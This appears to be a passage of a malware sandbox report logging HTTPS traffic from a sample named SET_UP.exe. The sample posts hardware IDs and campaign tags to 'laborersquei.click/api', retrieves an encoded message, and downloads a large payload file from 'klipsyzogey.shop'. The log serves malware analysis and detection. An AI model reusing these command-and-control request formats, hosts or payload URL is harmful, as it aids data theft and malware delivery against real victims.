                                                                                                                                          2024-12-25 21:17:16 UTC2773OUTData Raw: 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52 9c ab a6 b6 5f c9 35 8b 56 2d 7b 91 d7 e9
                                                                                                                                          Data Ascii: f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR_5V-{
                                                                                                                                          2024-12-25 21:17:17 UTC1129INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 25 Dec 2024 21:17:17 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Set-Cookie: PHPSESSID=9ep97fqg2f0lt3bnv00lqhgokn; expires=Sun, 20 Apr 2025 15:03:56 GMT; Max-Age=9999999; path=/
                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                          Pragma: no-cache
                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          vary: accept-encoding
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lGPn%2FOAEYQiKY6eWPogQ9xpnge655EH9k4yB2XygfK1J0UowpVzR7L1mlWCCENbsRwggU6WQLfRmS4CbbU7YG4wRuIHIW1c9xaMNraoq9uSGFNqLy8MTp%2FYtInhE11ndWVWMO4M%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8f7bdb65beef72b7-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1798&min_rtt=1793&rtt_var=684&sent=12&recv=23&lost=0&retrans=0&sent_bytes=2846&recv_bytes=19058&delivery_rate=1586956&cwnd=192&unsent_bytes=0&cid=74cb665c8936998c&ts=999&x=0"
                                                                                                                                          2024-12-25 21:17:17 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                          2024-12-25 21:17:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          3192.168.2.449733104.21.89.2504436556C:\Users\user\Desktop\SET_UP.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-12-25 21:17:19 UTC284OUTPOST /api HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: multipart/form-data; boundary=UH1202JSAWTJPCRC47V
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                          Content-Length: 8791
                                                                                                                                          Host: laborersquei.click
                                                                                                                                          2024-12-25 21:17:19 UTC8791OUTData Raw: 2d 2d 55 48 31 32 30 32 4a 53 41 57 54 4a 50 43 52 43 34 37 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 41 30 37 31 37 33 37 30 30 43 45 42 41 31 37 38 42 38 35 31 35 34 43 39 34 32 31 41 31 38 37 0d 0a 2d 2d 55 48 31 32 30 32 4a 53 41 57 54 4a 50 43 52 43 34 37 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 55 48 31 32 30 32 4a 53 41 57 54 4a 50 43 52 43 34 37 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 45 4c
                                                                                                                                          Data Ascii: --UH1202JSAWTJPCRC47VContent-Disposition: form-data; name="hwid"5A07173700CEBA178B85154C9421A187--UH1202JSAWTJPCRC47VContent-Disposition: form-data; name="pid"2--UH1202JSAWTJPCRC47VContent-Disposition: form-data; name="lid"hRjzG3--EL
                                                                                                                                          2024-12-25 21:17:20 UTC1129INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 25 Dec 2024 21:17:19 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Set-Cookie: PHPSESSID=5612q492h6oth2efi5t1r8nmco; expires=Sun, 20 Apr 2025 15:03:58 GMT; Max-Age=9999999; path=/
                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                          Pragma: no-cache
                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          vary: accept-encoding
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VDcoaGiUgwcrJVv6aA9F3SeVuf545YOqa2qRZ1vcgdJZ%2BXNdFnK8%2FccbmsTGpscxMBhEcdhxGimU9kBzJs4KGvzzhFrLViqXB5Qvkopn86nmdaIb4fv3s9rpsKQ4Kaasbp5DA%2Fw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8f7bdb744c850c84-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1627&min_rtt=1613&rtt_var=615&sent=7&recv=15&lost=0&retrans=0&sent_bytes=2846&recv_bytes=9733&delivery_rate=1810291&cwnd=150&unsent_bytes=0&cid=0acd89819c8311a5&ts=868&x=0"
                                                                                                                                          2024-12-25 21:17:20 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                          2024-12-25 21:17:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          4192.168.2.449736104.21.89.2504436556C:\Users\user\Desktop\SET_UP.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-12-25 21:17:21 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: multipart/form-data; boundary=LB6A8ZHZIG3X
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                          Content-Length: 20402
                                                                                                                                          Host: laborersquei.click
                                                                                                                                          2024-12-25 21:17:21 UTC15331OUTData Raw: 2d 2d 4c 42 36 41 38 5a 48 5a 49 47 33 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 41 30 37 31 37 33 37 30 30 43 45 42 41 31 37 38 42 38 35 31 35 34 43 39 34 32 31 41 31 38 37 0d 0a 2d 2d 4c 42 36 41 38 5a 48 5a 49 47 33 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4c 42 36 41 38 5a 48 5a 49 47 33 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 45 4c 56 49 52 41 0d 0a 2d 2d 4c 42 36 41 38 5a 48 5a 49 47 33 58 0d
                                                                                                                                          Data Ascii: --LB6A8ZHZIG3XContent-Disposition: form-data; name="hwid"5A07173700CEBA178B85154C9421A187--LB6A8ZHZIG3XContent-Disposition: form-data; name="pid"3--LB6A8ZHZIG3XContent-Disposition: form-data; name="lid"hRjzG3--ELVIRA--LB6A8ZHZIG3X
                                                                                                                                          2024-12-25 21:17:21 UTC5071OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                          Data Ascii: lrQMn 64F6(X&7~`aO
                                                                                                                                          2024-12-25 21:17:22 UTC1136INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 25 Dec 2024 21:17:22 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Set-Cookie: PHPSESSID=uvueqq4v02dblc110fqmd6jg3e; expires=Sun, 20 Apr 2025 15:04:01 GMT; Max-Age=9999999; path=/
                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                          Pragma: no-cache
                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          vary: accept-encoding
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vxoCdUmaKhF47ayBOZpof7LAMypCPEz4eXTLXTcW%2FTcAcDp05mawJ5Gwg053zSL0QoI0v0HjrBhxBJ9r39%2F7qRBEiROJOe9aAqZWCNKmP%2Bzm8pAmP98731MGwTbxvMkI3%2F%2BqIHY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8f7bdb837fca0f8c-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1608&min_rtt=1602&rtt_var=614&sent=17&recv=25&lost=0&retrans=0&sent_bytes=2846&recv_bytes=21360&delivery_rate=1764350&cwnd=212&unsent_bytes=0&cid=21e3c41829427675&ts=1030&x=0"
                                                                                                                                          2024-12-25 21:17:22 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                          2024-12-25 21:17:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          5192.168.2.449739104.21.89.2504436556C:\Users\user\Desktop\SET_UP.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-12-25 21:17:24 UTC277OUTPOST /api HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: multipart/form-data; boundary=S3YCAMS19M3H
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                          Content-Length: 1211
                                                                                                                                          Host: laborersquei.click
                                                                                                                                          2024-12-25 21:17:24 UTC1211OUTData Raw: 2d 2d 53 33 59 43 41 4d 53 31 39 4d 33 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 41 30 37 31 37 33 37 30 30 43 45 42 41 31 37 38 42 38 35 31 35 34 43 39 34 32 31 41 31 38 37 0d 0a 2d 2d 53 33 59 43 41 4d 53 31 39 4d 33 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 53 33 59 43 41 4d 53 31 39 4d 33 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 45 4c 56 49 52 41 0d 0a 2d 2d 53 33 59 43 41 4d 53 31 39 4d 33 48 0d
                                                                                                                                          Data Ascii: --S3YCAMS19M3HContent-Disposition: form-data; name="hwid"5A07173700CEBA178B85154C9421A187--S3YCAMS19M3HContent-Disposition: form-data; name="pid"1--S3YCAMS19M3HContent-Disposition: form-data; name="lid"hRjzG3--ELVIRA--S3YCAMS19M3H
                                                                                                                                          2024-12-25 21:17:24 UTC1130INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 25 Dec 2024 21:17:24 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Set-Cookie: PHPSESSID=agb6r95a4v6nkc74fj01uehakv; expires=Sun, 20 Apr 2025 15:04:03 GMT; Max-Age=9999999; path=/
                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                          Pragma: no-cache
                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          vary: accept-encoding
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2%2B8haBTAgcxhoXCR1co9Pz8o0y7VpOoTEZAgWRy7LtEoEHy2r453o1eWfy0UTqrxsyrU6A7slthk%2FWv0NOmVTzioJurQp%2Bn4GQao59Yj2kJ00MMjx2WRvRMSdH%2FXeRNtJlkDsVk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8f7bdb93492a4400-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1782&min_rtt=1662&rtt_var=709&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=2124&delivery_rate=1756919&cwnd=155&unsent_bytes=0&cid=d0a90461d8678ff0&ts=759&x=0"
                                                                                                                                          2024-12-25 21:17:24 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                          2024-12-25 21:17:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          6192.168.2.449741104.21.89.2504436556C:\Users\user\Desktop\SET_UP.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-12-25 21:17:26 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: multipart/form-data; boundary=3ZX9UNNKS
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                          Content-Length: 1053
                                                                                                                                          Host: laborersquei.click
                                                                                                                                          2024-12-25 21:17:26 UTC1053OUTData Raw: 2d 2d 33 5a 58 39 55 4e 4e 4b 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 41 30 37 31 37 33 37 30 30 43 45 42 41 31 37 38 42 38 35 31 35 34 43 39 34 32 31 41 31 38 37 0d 0a 2d 2d 33 5a 58 39 55 4e 4e 4b 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 33 5a 58 39 55 4e 4e 4b 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 45 4c 56 49 52 41 0d 0a 2d 2d 33 5a 58 39 55 4e 4e 4b 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73
                                                                                                                                          Data Ascii: --3ZX9UNNKSContent-Disposition: form-data; name="hwid"5A07173700CEBA178B85154C9421A187--3ZX9UNNKSContent-Disposition: form-data; name="pid"1--3ZX9UNNKSContent-Disposition: form-data; name="lid"hRjzG3--ELVIRA--3ZX9UNNKSContent-Dis
                                                                                                                                          2024-12-25 21:17:27 UTC1129INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 25 Dec 2024 21:17:26 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Set-Cookie: PHPSESSID=ruqr926luok1kab3cte3epf5tf; expires=Sun, 20 Apr 2025 15:04:05 GMT; Max-Age=9999999; path=/
                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                          Pragma: no-cache
                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          vary: accept-encoding
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JQS9YkD%2BbdJ4h7KbYcLj9D%2FUhqMu%2BOEfLC2U5l44cMH0L1jaP3gncLdHopuTKcE1bVQCnyg2bL98Ze5DN26%2FcKJ7BQ0Q6OLiVcxiJP0E4MwOAo2wOlHoX7mmiiuaigHwL18PTHo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8f7bdba06fa44344-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1777&min_rtt=1745&rtt_var=677&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=1963&delivery_rate=1673352&cwnd=47&unsent_bytes=0&cid=52461f7735d5c4ed&ts=838&x=0"
                                                                                                                                          2024-12-25 21:17:27 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                          2024-12-25 21:17:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          7192.168.2.449743104.21.89.2504436556C:\Users\user\Desktop\SET_UP.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-12-25 21:17:28 UTC267OUTPOST /api HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                          Content-Length: 115
                                                                                                                                          Host: laborersquei.click
                                                                                                                                          2024-12-25 21:17:28 UTC115OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 45 4c 56 49 52 41 26 6a 3d 65 66 64 65 62 64 65 30 35 37 61 31 64 66 33 66 37 63 31 35 62 37 66 34 64 61 39 30 37 63 32 64 26 68 77 69 64 3d 35 41 30 37 31 37 33 37 30 30 43 45 42 41 31 37 38 42 38 35 31 35 34 43 39 34 32 31 41 31 38 37
                                                                                                                                          Data Ascii: act=get_message&ver=4.0&lid=hRjzG3--ELVIRA&j=efdebde057a1df3f7c15b7f4da907c2d&hwid=5A07173700CEBA178B85154C9421A187
                                                                                                                                          2024-12-25 21:17:29 UTC1130INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 25 Dec 2024 21:17:28 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Set-Cookie: PHPSESSID=mv2s2vbo5p47ekadolc5jcolbe; expires=Sun, 20 Apr 2025 15:04:07 GMT; Max-Age=9999999; path=/
                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                          Pragma: no-cache
                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          vary: accept-encoding
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H7N7SCahw32xgk0yXsfHwpRmcyTm9Blr4EdEe0DN08HiFzwUUbsHGSnvbjY9GDAmmwgfrNE5IAt8iSjTof%2Bxv5PcfT5LsU5ztrLlGV3%2FjOYn2RhAp%2B0PpHQbN0gbZi2%2BsmXrJIo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8f7bdbaddaab4211-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1573&min_rtt=1556&rtt_var=619&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=1018&delivery_rate=1719670&cwnd=239&unsent_bytes=0&cid=d75e70208619f607&ts=779&x=0"
                                                                                                                                          2024-12-25 21:17:29 UTC218INData Raw: 64 34 0d 0a 77 56 54 4d 79 47 57 41 58 76 70 45 4d 41 32 58 7a 35 46 65 6b 4d 65 46 58 52 4d 48 45 69 76 73 67 45 68 62 41 43 52 43 50 52 79 61 4c 2b 36 39 52 37 70 38 6b 6a 42 45 66 65 54 31 7a 58 48 4d 36 4f 73 34 59 6d 34 38 57 49 54 76 4f 41 63 76 56 79 5a 61 64 72 67 68 75 4a 52 4b 38 43 32 53 61 6b 52 31 34 2b 32 39 66 50 61 7a 70 32 63 68 4b 7a 42 4f 7a 72 70 35 4a 69 78 66 59 45 67 2b 2b 33 61 6b 76 42 48 77 4c 63 41 59 48 31 47 34 70 50 30 33 34 4c 54 38 4a 33 78 67 64 31 4c 43 38 79 41 30 63 48 68 74 56 48 4b 31 43 36 2b 6b 46 64 38 74 6b 69 55 65 65 65 2b 37 73 33 4b 79 6f 66 46 2f 4b 54 63 2b 43 59 6d 69 63 6d 74 39 65 51 3d 3d 0d 0a
                                                                                                                                          Data Ascii: d4wVTMyGWAXvpEMA2Xz5FekMeFXRMHEivsgEhbACRCPRyaL+69R7p8kjBEfeT1zXHM6Os4Ym48WITvOAcvVyZadrghuJRK8C2SakR14+29fPazp2chKzBOzrp5JixfYEg++3akvBHwLcAYH1G4pP034LT8J3xgd1LC8yA0cHhtVHK1C6+kFd8tkiUeee+7s3KyofF/KTc+CYmicmt9eQ==
                                                                                                                                          2024-12-25 21:17:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          8192.168.2.449744172.67.214.1864436556C:\Users\user\Desktop\SET_UP.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-12-25 21:17:31 UTC206OUTGET /int_clp_sha.txt HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                          Host: klipsyzogey.shop
                                                                                                                                          2024-12-25 21:17:31 UTC901INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 25 Dec 2024 21:17:31 GMT
                                                                                                                                          Content-Type: text/plain
                                                                                                                                          Content-Length: 8371434
                                                                                                                                          Connection: close
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          ETag: "2a2989ed741c431f4a3276264f7bdb61"
                                                                                                                                          Last-Modified: Wed, 25 Dec 2024 17:25:54 GMT
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kZRg3UpYEoVtlnXe5b%2FchEc9m0SqnU5%2FHJesCNSeR2Qo775vRd4%2BA3egpPEP40GqxMltAARvrvRSxs0OADspMyrCOVm6tE6XdDuEAHE87ptsskMfiY2d6sFHIrmTbdhQcEct"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8f7bdbbea8fa436e-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2013&min_rtt=2005&rtt_var=768&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2867&recv_bytes=820&delivery_rate=1409946&cwnd=237&unsent_bytes=0&cid=b2b8c1eda8171b27&ts=639&x=0"
